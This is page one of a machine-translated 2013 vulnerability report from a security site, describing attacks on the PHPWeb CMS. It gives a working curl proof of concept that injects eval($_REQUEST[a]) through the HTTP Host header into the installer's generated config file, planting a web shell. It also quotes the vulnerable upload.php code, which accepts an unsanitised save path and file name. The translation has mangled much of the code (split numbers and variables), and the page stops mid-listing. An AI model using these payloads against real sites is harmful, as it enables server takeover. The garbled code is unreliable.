phpweb finished website to the latest version(inject, upload, write the shell)-vulnerability warning-the black bar safety net

ID MYHACK58:62201336563
Type myhack58
Reporter 佚名
Modified 2013-01-04T00:00:00



The reason chicken is the exploit installing the file to re-generate the configuration file write executable code

Chicken 1: the destructive action of a very large re-write the configuration file the database connection file

Tasteless 2: There is some Safety common sense of the webmasters will delete the install directory

Although tasteless, but there are also advantages: not affected by magic_quotes_gpc, the webserver impact


$siteurl="http://".$ _SERVER["HTTP_HOST"]."/"; //Not filtered

$filestr = fread(fopen($SysConfigFile, 'r'),3 0 0 0 0);

$filestr=str_replace(" ","",$filestr);








fwrite(fopen($ConFile,"w"),$filestr,3 0 0 0 0);

$_SERVER["HTTP_HOST"] is the http head in the HOST to pass over control,and is not affected by the magic_quotes_gpc effects ^ _ ^

poc: the



curl --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"

shell address: /

With before phpcms like the need to the remote database

Upload vulnerability(need feed back) of:

Vulnerability file: /kedit/upload_cgi/upload.php

This many people know,but very tasteless iis6 analytical or GPC off conditions before they can be used

<? php

define("ROOTPATH", "../../");




if(! is_dir(ROOTPATH.$ _POST['attachPath'].$ dt)){

@mkdir(ROOTPATH.$ _POST['attachPath'].$ dt,0 7 7 7);


//File to save the directory path

$save_path = ROOTPATH.$ _POST['attachPath'].$ dt.'/';

echo $save_path;

//File to save the directory URLS

$save_url = '../../'.$ _POST['attachPath'].$ dt.'/';

//Define the allowed Upload file extension

$ext_arr = array('gif','jpg','png','bmp'); //limit suffix

//Maximum file size

$max_size = 1 0 0 0 0 0 0;

//Change directory permissions

@mkdir($save_path, 0 7 7 7);

//File full path

$file_path = $save_path.$ _POST['fileName']; //save file name

//File URL

$file_url = $save_url.$ _POST['fileName'];

[1] [2] next